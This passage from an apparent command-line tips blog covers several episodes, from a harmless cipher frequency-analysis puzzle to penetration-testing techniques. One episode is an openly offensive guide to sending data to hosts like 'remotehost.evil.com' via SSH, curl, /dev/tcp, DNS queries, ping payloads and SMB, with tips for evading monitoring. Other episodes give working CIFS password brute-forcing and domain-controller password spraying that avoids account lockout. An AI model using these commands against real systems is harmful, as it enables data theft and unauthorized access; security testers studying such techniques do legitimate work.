Tuesday, January 24, 2012

Episode #165: What's the Frequency Kenneth?

Tim helps Tim crack the code

Long time reader, second time caller emailer writes in:

I've always been interested in mystery and codes (going back to 'Mystery Club' in 7th Grade), and today I discovered a cool show on History Channel called Decoded. They were talking about cryptography, specifically frequency analysis. I'm not an educator here but just to make sure we're on the same page: frequency analysis is one method of cracking a cipher by calculating how many times a certain cipher letter appears. From there, one can make a best guess on what the most frequent letters are.

Ok anyway, I've been doing some fun cipher puzzles in my spare time and thought about how this could be code. Say we have a document with a cipher text (letters or numbers, separated by a comma or space). Is it possible to write a code to do a frequency analysis on the ciphertext and maybe even replace the cipher with the results? So if the most frequent cipher are 13 and 77, alter the document and replace 13 and 77, with the most common letters E and T, for example.


This type of statistical analysis works better with longer ciphertext. So I created a substitution cipher that produced the following output. For the sake of simplicity, I didn't replace the punctuation and the spaces

"YETU HTPVI MOF UELCP MOF STC LCRVCU T DOOZ SLXEVW LK MOF ETRV CO VQXVWULIV LC UEV IFNAVSU? HTMNV MOF STC, NFU LU'I COU UVWWLNJM JLPVJM. LHTDLCV EOY MOF YOFJZ WVTSU LK MOFW ZOSUOW UOJZ MOF "MOF ETRV TXXVCZLSLULI, T ZLIVTIV UETU LI JLKV-UEWVTUVCLCD LK COU UWVTUVZ. YV ETRV T ULHV-UVIUVZ SFWV UETU SFWVI 99% OK TJJ XTULVCUI YLUE CO COULSVTNJV ILZV-VKKVSUI, NFU L'H COU DOLCD UO DLRV MOF UETU: L'H DOLCD UO DLRV MOF T CVY VQXVWLHVCUTJ UWVTUHVCU HM SOFILC ZWVTHVZ FX JTIU YVVP. CO, HM SOFILC ETI CO HVZLSTJ UWTLCLCD. CO, L ETRV CO VRLZVCSV UETU UEV CVY UWVTUHVCU YLJJ YOWP, TCZ LU'I CVRVW NVVC UVIUVZ OW TCTJMBVZ LC ZVXUE -- NFU L'H DOLCD UO DLRV LU UO MOF TCMYTM NVSTFIV HM SOFILC UELCPI LU LI DOOZ IUFKK." MOF'Z KLCZ TCOUEVW ZOSUOW, L EOXV. WTULOCTJ XVOXJV JVTRV HVZLSTJ STWV UO UEV HVZLSTJ VQXVWUI. UEV HVZLSTJ VQXVWUI ETRV T HFSE NVUUVW UWTSP WVSOWZ UETC UEV GFTSPI."
-- ZTRLZ YTDCVW XEZ, ISL.SWMXU, 19UE OSU 02.


We can read a file using the command Get-Content (alias cat, gc, type) as we usually do, but let's use a Here-String instead.

PS C:\> $ciphertext = @"
"YETU HTPVI MOF UELCP MOF STC LCRVCU T DOOZ SLXEVW LK MOF ETRV CO VQXVWULIV LC UEV IFNAVSU?
HTMNV MOF STC, NFU LU'I COU UVWWLNJM JLPVJM. LHTDLCV EOY MOF YOFJZ WVTSU LK MOFW ZOSUOW UOJZ
MOF "MOF ETRV TXXVCZLSLULI, T ZLIVTIV UETU LI JLKV-UEWVTUVCLCD LK COU UWVTUVZ. YV ETRV T ULHV-
UVIUVZ SFWV UETU SFWVI 99% OK TJJ XTULVCUI YLUE CO COULSVTNJV ILZV-VKKVSUI, NFU L'H COU DOLCD
UO DLRV MOF UETU: L'H DOLCD UO DLRV MOF T CVY VQXVWLHVCUTJ UWVTUHVCU HM SOFILC ZWVTHVZ FX JTIU
YVVP. CO, HM SOFILC ETI CO HVZLSTJ UWTLCLCD. CO, L ETRV CO VRLZVCSV UETU UEV CVY UWVTUHVCU
YLJJ YOWP, TCZ LU'I CVRVW NVVC UVIUVZ OW TCTJMBVZ LC ZVXUE -- NFU L'H DOLCD UO DLRV LU UO MOF
TCMYTM NVSTFIV HM SOFILC UELCPI LU LI DOOZ IUFKK." MOF'Z KLCZ TCOUEVW ZOSUOW, L EOXV. WTULOCTJ
XVOXJV JVTRV HVZLSTJ STWV UO UEV HVZLSTJ VQXVWUI. UEV HVZLSTJ VQXVWUI ETRV T HFSE NVUUVW UWTSP
WVSOWZ UETC UEV GFTSPI."
-- ZTRLZ YTDCVW XEZ, ISL.SWMXU, 19UE OSU 02.
"@


The we start a Here-String with @" and close it with the matching "@ pair. Now we have a variable $cipher that contains our text. Next, let's get the frequency of each character used in our ciphertext.

PS C:\> ($ciphertext | Select-String -AllMatches "[A-Z]").matches | 
group value -noel | sort count -desc


Count Name
----- ----
90 V
76 U
58 L
55 T
53 O
47 C
31 W
29 E
29 S
28 Z
28 I
27 F
22 M
21 J
19 H
15 D
15 X
13 R
12 Y
10 N
10 K
8 P
4 Q
1 G
1 B
1 A


We start by piping the ciphertext into the Select-String cmdlet where we use the regular expression "[A-Z]" to select each alphabet character individually. The AllMatches switch is used to return all the characters instead of just the first one found. The results are passed down the pipeline into the Group-Object cmdlet (alias group) to give us the count. The NoElement switch (shortened to noel) is used to discard the original objects as we don't need them in the output.

Let's save the letters into a variable so we can use it later for substitution.

PS C:\> $cipherletters = ($ciphertext | Select-String -AllMatches "[A-Z]").matches | 
group value -noel | sort count -desc | % { $_.Name }

PS C:\> $cipherletters
V
U
L
T
O
C
W
...


We used the same command as above, except with the added ForEach-Object cmdlet (alias %) where the value of the Name property is output and stored in our variable.

Now that we have our letters sorted by their frequency we need to compare them with the statistic frequency of characters in the English language.

e  12.702%
t 9.056%
a 8.167%
o 7.507%
i 6.966%
n 6.749%
s 6.327%
h 6.094%
r 5.987%
d 4.253%
l 4.025%
c 2.782%
u 2.758%
m 2.406%
w 2.360%
f 2.228%
g 2.015%
y 1.974%
p 1.929%
b 1.492%
v 0.978%
k 0.772%
j 0.153%
x 0.150%
q 0.095%
z 0.074%


We aren't going to worry about the percentages and we'll just get the letters in order. Later we'll map the two data sets together for our replacement.

PS C:\> $freqletters = "e","t","a","o","i","n","s","h","r","d","l","c","u",
"m","w","f","g","y","p","b","v","k","j","x","q","z"


Now for a quick substitution.

PS C:\> $replacedtext = $ciphertext
PS C:\> for ($i=0; $i -lt 26; $i++) { $replacedtext = $replacedtext -creplace
$cipherletters[$i], $freqletters[$i] }


We use a For loop to count from 0 to 25 where $i is used as the iterator. The iterator is used to match the Nth item in each array (remember, base zero) and use the mapped characters for replacement. The CReplace operator is used for a case sensitive replacement as our cipher letters are upper case and our clear text letters are lower case. This is done to prevent double substitution.

Now to see what our output looks like.

PS C:\> $replacedtext
"phot wokel uic thank uic ron anyent o fiid raghes av uic hoye ni ejgestale an the lcbzert?
woube uic ron, bct at'l nit tessabmu makemu. awofane hip uic picmd seort av uics dirtis timd
uic "uic hoye oggendaratal, o daleole thot al mave-thseotenanf av nit tseoted. pe hoye o tawe-
telted rcse thot rcsel 99% iv omm gotaentl path ni nitareobme lade-evvertl, bct a'w nit fianf
ti faye uic thot: a'w fianf ti faye uic o nep ejgesawentom tseotwent wu riclan dseowed cg molt
peek. ni, wu riclan hol ni wedarom tsoananf. ni, a hoye ni eyadenre thot the nep tseotwent
pamm pisk, ond at'l neyes been telted is onomuqed an degth -- bct a'w fianf ti faye at ti uic
onupou berocle wu riclan thankl at al fiid ltcvv." uic'd vand onithes dirtis, a hige. sotainom
geigme meoye wedarom rose ti the wedarom ejgestl. the wedarom ejgestl hoye o wcrh bettes tsork
serisd thon the xcorkl."
-- doyad pofnes ghd, lra.rsugt, 19th irt 02.


Well, that isn't great. It looks like the only words successfully decryted are "the" and "been". There are a few more techniques for cryptanalysis of this type of cipher

With a bit of tweeking and adjustment of the frequency letters we can end up with the following.

"What makes you think you can invent a good cipher if you have no expertise in
the subject? Maybe you can, but it's not terribly likely. Imagine how you would react
if your doctor told you "You have appendicitis, a disease that is life-threatening if
not treated. We have a time-tested cure that cures 99% of all patients with no
noticeable side-effects, but I'm not going to give you that: I'm going to give you a
new experimental treatment my cousin dreamed up last week. No, my cousin has no
medical training. No, I have no evidence that the new treatment will work, and it's
never been tested or analyzed in depth -- but I'm going to give it to you anyway
because my cousin thinks it is good stuff." You'd find another doctor, I hope.
Rational people leave medical care to the medical experts. The medical experts have a
much better track record than the quacks."
-- David Wagner PhD, sci.crypt, 19th Oct 02.


Let's see if Hal is a better cracker than I am.

Hal gets cracking

Gah. I was always terrible at these puzzles as a child. Maybe my shell can help!

Getting the frequency counts is just a matter of piling up a bunch of shell primatives:

$ sed 's/[^A-Z]//g; s/\(.\)/\1\n/g' cyphertext | grep '[A-Z]' | 
sort | uniq -c | sort -nr

90 V
76 U
58 L
55 T
53 O
...

Notice there's two substitutions in the sed program. The first eliminates anything that's not an uppercase letter. The second puts a newline after each letter in the remaining text. So what I get is each letter from the input text on a line by itself.

Unfortunately, sed doesn't give me a good way to deal with the newlines in the original message. So after the last letter on each line I'm going to get the newline I add with sed, followed by the newline from the original input file. This gives me blank lines in the sed output and I don't want them! The next grep in the pipeline takes care of only giving me the lines that have letters on them.

From there I sort my output and then use "uniq -c" to count the occurrences of each letter. The final "sort -nr" gives me the counts in descending order.

Now let's add a little awk:

$ sed 's/[^A-Z]//g; s/\(.\)/\1\n/g' cyphertext | grep '[A-Z]' | 
sort | uniq -c | sort -nr | awk 'BEGIN {ORS = ""} {print $2}'

VULTOCWSEZIFMJHXDRYNKPQGBA

The awk I've added prints out the letters from my frequency chart. Normally awk would print them out one per line, just like they are in the input. But in the BEGIN block I'm telling awk to use the null string as the "output record separator" (ORS) instead of the usual newline. That gives me the letters all on one line without any whitespace.

Why is this useful? Because now I can do this:

$ cat cyphertext | tr $(sed 's/[^A-Z]//g; s/\(.\)/\1\n/g' cyphertext | grep '[A-Z]' |
sort | uniq -c | sort -nr |awk 'BEGIN {ORS = ""} {print $2}') \
etaoinshrdlcumwfgypbvkjxqz

"prot wokel uic trank uic hon anyent o giid hafres av uic roye ni ejfestale an tre
lcbzeht? woube uic hon, bct at'l nit tessabmu makemu. awogane rip uic picmd seoht av
uics dihtis timd uic "uic roye offendahatal, o daleole trot al mave-trseotenang av nit
tseoted. pe roye o tawe-telted hcse trot hcsel 99% iv omm fotaentl patr ni nitaheobme
lade-evvehtl, bct a'w nit giang ti gaye uic trot: a'w giang ti gaye uic o nep
ejfesawentom tseotwent wu hiclan dseowed cf molt peek. ni, wu hiclan rol ni wedahom
tsoanang. ni, a roye ni eyadenhe trot tre nep tseotwent pamm pisk, ond at'l neyes been
telted is onomuqed an deftr -- bct a'w giang ti gaye at ti uic onupou behocle wu
hiclan trankl at al giid ltcvv." uic'd vand onitres dihtis, a rife. sotainom feifme
meoye wedahom hose ti tre wedahom ejfestl. tre wedahom ejfestl roye o wchr bettes
tsohk sehisd tron tre xcohkl."
-- doyad pognes frd, lha.hsuft, 19tr iht 02.

What I did there was take my pipeline and put it inside "$(...)" so that the output of the pipeline becomes the first argument to my tr command. The letters in the list produced by my pipeline get replaced in with the letters in the standard English frequency chart.

Unfortunately, as Tim found out, the standard frequency chart doesn't work. Actually, my results are different from Tim's first attempt. I think he was cheating some where to get his "the"'s decoded correctly!

If at first you don't succeed, try, try again. We could just keep trying different permutations of our frequency list:

$ freqlist=$(sed 's/[^A-Z]//g; s/\(.\)/\1\n/g' cyphertext | grep '[A-Z]' | 
sort | uniq -c | sort -nr |awk 'BEGIN {ORS = ""} {print $2}')

$ permute etaoinshrdlcumwfgypbvkjxqz |
while read replace; do
misspell=$(cat cyphertext | tr $freqlist $replace | spell | wc -l);
[[ $misspell -lt 10 ]] && echo $replace && break;
(( $((++c)) % 1000 )) || echo -n . 1>&2;
done

First I assign the frequency analysis of my cyphertext to a variable so I don't have to keep recomputing it.

Next I cheat a whole lot by using a script I wrote a long time ago called permute that produces a list of all possible permutations of its input. My while loop reads those permutations one at a time and tries them via tr. The output of tr goes into spell which will give a list of the misspelled words. I count the number of misspelled words with "wc -l". If the number of misspellings is small, then I've probably found the right replacement list. In that case I'll output the $replace list that seems to work and terminate the loop with break.

The last line of the loop is the trick I showed you in Episode #163 for showing progress output in a loop. Every 1000 permutations tried, we'll output a dot just so you know that things are working.

Be prepared for a lot of dots, however. Unfortunately there are 26! = 4E26 possible permutations, which might take you-- or your computer-- more than a little while to test. Brute force really isn't a practical solution for this problem. But I wanted to show you that there is a solution that you could implement in shell (modulo my dirty little permute script), even if it is a lousy one.

Tuesday, January 10, 2012

Episode #164: Exfiltration Nation

Hal pillages the mailbox

Happy 2012 everybody!

In the days and weeks to come, the industry press will no doubt be filled with stories of all the high-profile companies whose data was "liberated" during the past couple of weeks. It may be a holiday for most of us, but it's the perfect time for the black hats to be putting in a little overtime with their data exfiltration efforts.

So it was somehow appropriate that we found that loyal reader Greg Hetrick had emailed us this tasty little bit of command-line exfiltration fu:

tar zcf - localfolder | ssh remotehost.evil.com "cd /some/path/name; tar zxpf -"

Ah, yes, the old "tar over SSH" gambit. The nice thing here is that no local file gets written, but you end up with a perfect directory copy over on "remotehost.evil.com" in a target directory of your choosing.

If SSH is your preferred outbound channel, and the local system has rsync installed, you could accomplish the same mission with fewer keystrokes:

rsync -aH localhost remotehost.evil.com:/some/path/name

If outbound port 22 is being blocked, you could use "ssh -p" or "rsync --port" to connect to the remote server on an alternate port number. Ports 80 and 443 are often open in the outbound direction when other ports are not.

But what if outbound SSH connections-- especially SSH traffic on unexpected port numbers-- are being monitored by your victim? Greg's email got me thinking about other stealthy ways to move data out of an organization using only command-line primitives.

My first thought was everybody's favorite exfiltration protocol: HTTPS. And nothing makes moving data over HTTPS easier than curl:

tar zcf - localfolder | curl -F "data=@-" https://remotehost.evil.com/script.php

"curl -F" fakes a form POST. In this case, the submitted parameter name will be "data". Normally you would use "@filename" after the "data=" to post the contents of a file. But we don't want to write any files locally, so we use "@-" to tell curl to take data from the standard input.

Of course, you'd also have to create script.php over on the remote web server and have it save the incoming data so that you could manually unpack it later. And, while it's commonly found on Linux systems, curl is not a built-in tool. So strictly speaking, I'm not supposed to be using it according to the rules of our blog.

So no SSH and now no curl. What's left? Well, I could just shoot the tarball over the network in raw mode:

tar zcf - localfolder >/dev/tcp/remotehost.evil.com/443

"/dev/tcp/remotehost.evil.com/443" is the wonderful bash-ism that allows me to make connections to arbitrary hosts and ports via the command-line. Note that because the "/dev/tcp/..." hack is a property of the bash shell, I can't use it as a file name argument to "tar -f". Instead I have to use redirection like you see in the example.

Maybe my victim is doing packet inspection. Perhaps I don't want to just send the unobfuscated tarball. I could use xxd to encode the tarball as a hex dump before sending:

tar zcf - localfolder | xxd -p >/dev/tcp/remotehost.evil.com/443

You would use "xxd -r" on the other end to revert the hex dump back into binary.

Instead of xxd, I could use "base64" for a simple base64 encoding. But that might be too obvious. How about a nice EBCDIC encoding on top of the base64:

tar zcf - localfolder | base 64 | dd conv=ebcdic >/dev/tcp/remotehost.evil.com/443

Use "dd conv=ascii if=filename | base64 -d" on the remote machine to get your data back. I'm guessing that nobody looking at the raw packet data would suspect EBCDIC as the encoding though.

Doing something like XOR encoding on the fly turns into a script, unfortunately. But there are some cool examples in several different languages (including the Unix shell and Windows Powershell) over here.

Or how about using DNS queries to exfiltrate data:

tar zcf - localfolder | xxd -p -c 16 |
while read line; do host $line.domain.com remotehost.evil.com; done

Once again I'm using xxd to encode my tar file as a hex dump. I read the hex dump line by line and use each line of data as the "host name" portion of a DNS query to my nameserver on remotehost.evil.com. By monitoring the DNS query traffic on the remote machine, I can reassemble the encoded data to get my original file content back.

Note that I've added the '-c 16" option to the xxd command to output 16 bytes (32 characters) per line. That way my "host names" are not flagged as invalid for being too long. You might also want to throw a "sleep" statement into that loop so that your victim doesn't become suspicious of the sudden blast of DNS queries leaving the box.

I could so something very similar using the ping command on Linux to exfiltrate my data in ICMP echo request packets:

tar zcf - localfolder | xxd -p -c 16 |
while read line; do ping -p $line -c 1 -q remotehost.evil.com; done

The Linux version of ping lets me use "-p" to specify up to 16 bytes of data to be included in the outgoing packet. Unfortunately, this option may not be supported on other Unix variants. I'm also using "-c 1" to send only a single instance of each packet and "-q" to reduce the amount of output I get. Of course, I'd have to scrape the content out of the packets on the other side, which will require a bit of scripting.

Well, I hope that gets your creative juices flowing. There's just so many different ways you can obfuscate data and move it around the network using the bash shell. But I think I better stop here before I make Tim cry. Now Tim, stop your sobbing and show us what you've got in Windows.

Tim wipes away his tears

I asked Santa for a few features to appear in Windows that are native to Linux, but all I got was a lump of coal. I keep asking Santa every year and he never writes back. I know people told me he doesn't exist, but HE DOES. He gave me a skateboard when I was 7. So yes, my apparent shunning by Santa made me cry.

I've got no built in commands for ssh, tar, base64, curl/wget, dev tcp, or any of the cool stuff Hal has. FTP could be used, and can support encryption, but you have to write a script for the FTP command (similar to this). While PowerShell scripts could be written to implement most of these functions, that would definitely cross into The Land of Scripts (and they have a restraining order against us, something about Hal not wearing pants last time he visited).

That pretty much leaves SMB connections and that has a number of problems. First, we don't have encryption, which may mean we can't use it on a Pen Test. Second, port 445 is usually heavily monitored or filtered. Third, we can't pick a different port and we are stuck with 445.

On the bright side it means that my portion of this episode is going to be short. First, we create the connection back to our server.

C:\> net use z: \\4.4.4.4\myshare myevilpassword1 /user:myeviluser


Then we can copy all the files we want to the Z. drive. We can accomplish this using Robocopy or PowerShell's Copy-Item (aliases copy, cp, and cpi) with the -Recurse switch.

Yep, that's it. Now back to my crying. Oh, and Happy Stinking New Year.

Edit: Marc van Orsouw writes in with the following
Some remarks about PowerShell options :

Of course you do not need the net use in PowerShell you can use UNC directly.
And there are a lot of options in your wishlist that can be done using .NET (mostly resulting in scripts on oneliners of course, so keep your list ;), although PSCX will solve a lot of them)

Some options I came up with :

A IMHO opinion another cool option is using PowerShell remoting (already encrypted)

This could be as easy as :

Invoke-Command -ComputerName evilserver {PARAM($txt);set-content stolen.txt $txt} -ArgumentList (get-content usernames.txt)

Some Ugly FTP example with Base64

[System.Net.FtpWebRequest][System.Net.WebRequest]::Create('ftp://evil.com/p.txt') |% {$_.Method = "STOR";$s = [byte[]][convert]::ToBase64String([System.IO.File]::ReadAllBytes('C:\username.txt')).tochararray();$_.GetRequestStream().Write($s, 0, $s.Length)}

And with Web service when remote server available (as in the PHP example) than it would be as simple as :

(New-WebServiceProxy -uri http://evil.com/store.asmx?WSDL).steal((get-content file.txt))


We can just use the UNC path (\\1.1.1.1\share instead of z:\) for exfiltration, but if we want to authenticate the best way is to use NET USE first.

The PowerShell Community Extensions (PSCX) do give a lot of cool functionality, but they are add-ons and not allowed. Similarly, the .NET framework gives us tremendous power, but crosses into script-land rather quickly and is also not allowed.

The remoting command is really cool *and* it is encrypted too. I forgot about this one. The New-WebServiceProxy cmdlet is a really intriguing way to do this as well. I have never used this cmdlet before, and if we use HTTPS instead of HTTP it would be encrypted too. Very nice!

Edit 2: Marc van Orsouw has another cool suggestions
PS C:\> Import-Module BitsTransfer
PS C:\> Start-BitsTransfer -Source c:\clienttestdir\testfile1.txt -Destination https://server01/servertestdir/testfile1.txt
-TransferType Upload -cred (get-credential)


Mark is a PowerShell MVP and blogs over at http://thepowershellguy.com/

Tuesday, November 29, 2011

Episode #163: Pilgrim's Progress

Tim checks the metamail:

I hope everyone had a good Thanksgiving. I know I did, and I sure have a lot to be thankful for.

Today we receive mail about mail. Ed writes in about Rob VandenBrink writing in:

Gents,

Rob VandenBrink sent me a cool idea this morning. It's for printing out a text-based progress indicator in cmd.exe. The idea is that if you have a loop that's doing a bunch of stuff, without any indication to the user, you can just echo a dot on the screen at each iteration of the loop to show that you are still alive and have processed another iteration. The issue in cmd.exe is echoing the dot without a CRLF, so that it goes nicely across the screen. Here's Rob's approach (which uses set /p very cleverly to define a variable, but without using that variable). On a few episodes, I used set /a because of its nice property of doing math without a CRLF. Here, Rob uses set /p to avoid the CRLF.

C:\> for /L %i in (1,1,5) do @timeout 1 >nul & <nul (set /p z=.)
..... <-- Progress Dots


Just replace the timeout command with something useful, and vary the FOR iterator loop to something that makes sense.

Worthy of an episode?


Well Ed, you can tell Rob that it is. Rob, feel free to send more cool suggestions to Ed and Ed can send them to us. I'll pass along what I think is worthy of an episode to Hal, so Rob talk to Ed, Ed talk to Tim, Tim talks to Hal, Hal responds to Tim, Tim responds to Ed, Ed responds to Rob. Unless Ed is unavailable, then we Rob should find Tim who will check for Ed, then...

Ok, we'll work out those details later. We certainly need to keep a strict flow of information, or else it could confusing, and we would hate that.

The trick with this command is using the /P switch with the Set command. The /P switch is used to prompt a user for input. The standard syntax looks like this:

SET /P variable=[promptString]


We are using a dummy variable Z to receive input, and the promptString is our dot. We feed NUL into the Set command so it doesn't hang while waiting for input. Since we didn't provide a carriage return the prompt is not advanced to the next line. That way we can output multiple dots on the same line. To prevent extra spaces between the dots we need to make sure there are no spaces between the dot and the next character, whether it be a closing parenthesis or a input redirection (<).

I typically write it a little differently so it is a little clearer that the NUL is being fed into Set, but the effect is the same.

C:\> (set /P z=.<NUL) & (set /P z=.<NUL)
..


PowerShell

One of the best practices of PowerShell is to write each command so the output can be used as input to another command. This means that dots would mess up our nice object-type output. That's no skin off our back, as we have a cmdlet to keep track of progress for us, Write-Progress. However, it does require a bit of knowledge as to the number of iterations we will go through. Not usually a big deal though, but it may require that some input be preloaded so this calculation can be preformed. There are all sorts of cool things we can do with this cmdlet. Examples of coolness include: multiple progress bars, displaying time remaining, and displaying extra information on the current operation.

 Test
Working
[ooooooooooooooooooooooooooooooooooooo ]

PS C:\> 1..100 | % { sleep 1; Write-Progress -Activity Test -Status Working -PercentComplete $_ }


The Activity and Status parameters are used to provide additional information. The Activity is usually used to provide a high level description of the process and the Status switch is used to describe the current operation, assuming there are multiple. Similar to our the cmd.exe command, replace the sleep 1 with something useful.

The SecondsRemaining parameter can be used to display the estimated time remaining. This time must be calculated by the author of the script or command, and since these calculations are never close to correct, I personally refuse to ever even try to calculate the remaining time. So enough of my rant and back to the task at hand.

Multiple progress bars can be used by using a unique ID for each. The default ID is 0, so we can use 1 for the second progress bar.

 Testing
Outer
[oooooooooooooooooo ]
Testing
Inner
[oooooooooooooooooooooooooooooooooooooooooooooooooooooo ]

PS C:\> 1..100 | % { Write-Progress -Activity Testing -Status Outer -PercentComplete $_;
1..100 | % { sleep 0.5; Write-Progress -Activity Testing -Status Inner -PercentComplete $_ -ID 1 }
}


Another bonus is that the progress bar is displayed at the top of the screen so it doesn't interfere with the most recent output. To make it even better, it disappears after the command has completed. We have a progress display and we don't have any messy output to clean up, awesome!

The cmd.exe output is functional, but not great, and the PowerShell version is really pretty. My bet is Hal and his *nix fu is going to snuggle up between these two. Hal, snuggle away.

Hal emerges from a food coma

Don't even get me started about "snuggling" with Tim. Mostly he just rolls over and goes to sleep, leaving me with the aftermath. He never cares about my feelings or what's important to me...

Oh, sorry. I forgot we were talking command line kung fu here. I'm not going to be getting much "snuggling" on that front either, as it turns out. The Linux options pretty much emulate the two choices that Tim presented on the Windows side.

The portable method uses shell built-ins and looks a lot like the CMD.EXE solution. Here's an example using the while loop from last week's Episode:

paste <(awk '{print; print; print; print}' users.txt) passwords.txt |
while read u p; do
mount -t cifs -o domain=mydomain,user=$u,password=$p \
//myshare /mnt >/dev/null 2>&1 \
&& echo $u/$p works && umount /mnt
(( $((++c)) % 100 )) || echo -n . 1>&2
done >working-passwords.txt

The code I've added in bold face is the part that prints dots to show progress. I've got a variable "$c" that gets incremented each time through the loop. We then take the value of that variable modulo 100. Every hundred iterations, that expression will have the value zero, so the echo statement after the "||" will get executed and print a dot. I use "echo -n" so we don't get a newline after the dot.

Notice also the "1>&2" after the echo expression. This causes the dots coming out of the echo command heading for the standard output to go to the standard error instead. That way I'm able to redirect the normal output of the loop-- the usernames and passwords I'm brute-forcing-- into a file using ">working-passwords.txt" at the end of the loop and still see the progress dots on the standard error.

You can slip this code into any loop you care to. And by adjusting the value on the right-hand side of the modulus operator you can cause the dots to be printed more or less frequently, depending on the size of your input. If you're reading a log file that's hundreds of thousands of lines long, you might want to do something like "... % 10000" so your screen doesn't just fill up with dots. On the other hand, you want the dots to appear frequently enough that it looks like something is happening. You just have to play around with the number until you're happy.

While this approach is very portable and easy to use, it only works inside an explicit loop. There are lots of tasks where we're processing data using a series of commands in a pipeline with no loops at all. For example, there's pipelines like the one from Episode #38:

grep 'POST /login/form' ssl_access_log* | 
sed -r 's/.*(MSIE [0-9]\.[0-9]|Firefox\/[0-9]+|Safari|-).*/\1/' |
sort | uniq -c |
awk '{ t = t + $1; print} END { print t " TOTAL" }'

Oh sure, I could force a loop at the front of the pipeline just to get some dots:

while read line; do
echo $line
(( $((++c)) % 10000 )) || echo -n . 1>&2
done <ssl_access_log* | grep 'POST /login/form' | ...

But let's face it, this is gross, inefficient, and silly. What bash is lacking is a built-in construct like PowerShell's Write-Progress cmdlet.

Happily, there's an Open Source utility called "pv" (pipe viewer) that kicks Write-Progress' butt through the flimsy walls of our command line dojo. Unhappily, it's not a built-in utility, so strictly speaking it's not allowed by the rules of our blog. But sometimes it's fun to bring a bazooka to a knife fight.

In it's simplest usage, pv just replaces the silly while loop that I forced onto the beginning of our pipeline:

# pv -c ssl_access_log* | 
grep 'POST /login/form' |
sed -r 's/.*(MSIE [0-9]\.[0-9]|Firefox\/[0-9]+|Safari|-).*/\1/' |
sort | uniq -c | awk '{ t = t + $1; print} END { print t " TOTAL" }' >counts.txt

83.4MB 0:00:05 [16.2MB/s] [=================================>] 100%

pv reads our input files and sends their content to the standard output-- just like the cat command. But it also creates a progress bar on the standard error. The "-c" option tells pv to use "curses" style cursor positioning sequences to update the progress bar more efficiently.

I'm redirecting the actual pipeline output with the browser counts into a file (">counts.txt") so it's easier to focus in on the progress bar. I've captured the output after the loop has completed, so you're seeing the 100% completion bar, but notice that the left-hand side of the bar tracks the total data read and the amount of time taken.

What's really fun, however, is using multiple instances of pv inside a complicated pipeline:

# pv -cN Input ssl_access_log* | 
grep 'POST /login/' | pv -cN grep |
sed -r 's/.*(MSIE [0-9]\.[0-9]|Firefox\/[0-9]+|Safari|-).*/\1/' | pv -cN sed |
sort | uniq -c | awk '{ t = t + $1; print} END { print t " TOTAL" }' >counts.txt

grep: 7.5MB 0:00:04 [1.51MB/s] [ <=> ]
sed: 259kB 0:00:05 [51.8kB/s] [ <=> ]
Input: 83.4MB 0:00:04 [17.1MB/s] [======================>] 100%

You'll notice that I've added two more pv invocations in the middle of our pipeline: one after the grep and one after the sed command. I'm also using the "-N" ("name") flag to assign a unique name to each instance of pv. This name appears in front of each progress bar so you can tell them apart.

What's fun about this mode is that it shows you how much you're reducing the data as it goes through each command. The total "Input" size is 83MB of access logs, which grep winnows down to 7.5MB of matching lines. Then sed removes everything except the browser name and major version number, leaving us with only 260KB of data.

pv is widely available in various Linux distros, though it's not typically part of the base install. There's a BSD Ports version available and it's even in the MacOS HomeBrew system. Solaris folks can find it at Sunfreeware. Everybody else gets to build it from source. But it's a useful tool in your command line toolchest.

Consider this your early Xmas present. And you didn't even have to brave the pepper spray at Wal*mart to get it.

Tuesday, November 15, 2011

Episode #162: Et Tu Bruteforce

Tim is looking for a way in

A few weeks ago I got a call from a Mr 53, of LaNMaSteR53 fame from the pauldotcom blog. Mister, Tim "I have a very cool first name" Tomes was working on a way to brute force passwords. The scenario is hundreds (or more) accounts were created all (presumably) using the same initial password. He noticed all the accounts were created the same day and none of them had ever been logged in to.

To brute force the passwords a subset of a large password dictionary is used tried against each account, but the same password was never used twice. This effectively bypasses the account lockout policy (5 failed attempts) and allows a larger set of passwords to be tested without locking out any accounts.

So instead of this scenario:
user1 - password1, password2, password3, password 4
user2 - password1, password2, password3, password 4
user3 - password1, password2, password3, password 4
...

We do it this way:
user1 - password1, password2, password3, password4
user2 - password5, password6, password7, password8
user3 - password9, password10, password11, password12
...

The effectiveness of this method is based on the assumption that each account was created with the same default password. Instead of testing 4 passwords, we can test 4 * # of users. So for 1000 accounts that means 4000 password guesses instead of just 4.

To pull this off we need to read two files, a user list and a password list. We need to take the first user and the first four passwords, then the send user and the next four passwords, and so on. This is the command to output the username and password pairs.

PS C:\> $usercount=0; gc users.txt | 
% {$user = $_; gc passwords.txt -TotalCount (($usercount * 4) + 4) |
select -skip ($usercount++ * 4) } | % { echo "$user $_" }


user1 password1
user1 password2
user1 password3
user1 password4
user2 password5
user2 password6
user2 password7
user2 password8
user3 password9
...


If we wanted to test the credentials against a domain controller we can do this:

PS C:\> $usercount=0; gc users.txt | % {$user = $_; 
gc passwords.txt -TotalCount (($usercount * 4) + 4) | select -skip ($usercount++ * 4) } |
% { net use \\mydomaincontroller\ipc$ /user:somedomain\$user $_ 2>&1>$null;
if ($?) { echo "This works $user/$_ "; net use \\mydomaincontroller\ipc$ /user:$user /del } }


This works user7/Password30


CMD.EXE

When Pen Testing you many times get access to CMD.EXE only. The PowerShell interfaces are a bit flaky, and many times the systems that are initially compromised don't have it installed so we need to rely on CMD.EXE.

C:\> cmd /v:on /c "set /a usercount=0 >NUL & for /F %u in (users.txt) do @set
/a passcount=0 >NUL & set /a lpass=!usercount!*4 >NUL & set /a upass=!usercount!*4+4
>NUL & @(for /F %p in (passwords.txt) do @(IF !passcount! GEQ !lpass! (IF !passcount!
LSS !upass! (@echo %u %p))) & set /a passcount=!passcount!+1 >NUL) & set /a
usercount=!usercount!+1 >NUL"


user1 password1
user1 password2
user1 password3
user1 password4
user2 password5
user2 password6
user2 password7
user2 password8
user3 password9
...


We start off enabling delayed variable expansion as usual. The usercount is initialized to 0 and it will be used to keep track of how many users have been attempted so far. We need this number to determine the proper password range to use. The users.txt file is then read via a For loop. Inside this (outer) For loop the passcount variable is set to 0. The passcount variable is used to keep track of where we are in the password file so we only use the 4 passwords we need. Related to that, the lower bound (lpass) and the upper bound (upass) are set so we know the range of the 4 passwords to be used. Now it is (finally) time to read the password file.

Another, inner, For loop is used to read through the password file. A pair of If statements are used to make sure the current password is in the proper bounds, and if it is, it is output. The passcount variable is then incremented to keep track of our count. After we go through the entire password file we increment the usercount. The process starts all over using the next user read from the file.

All we need to do now is Frankenstein this command with other Tim's command.

C:\> cmd /v:on /c "set /a usercount=0 >NUL & for /F %u in (users.txt) do @set
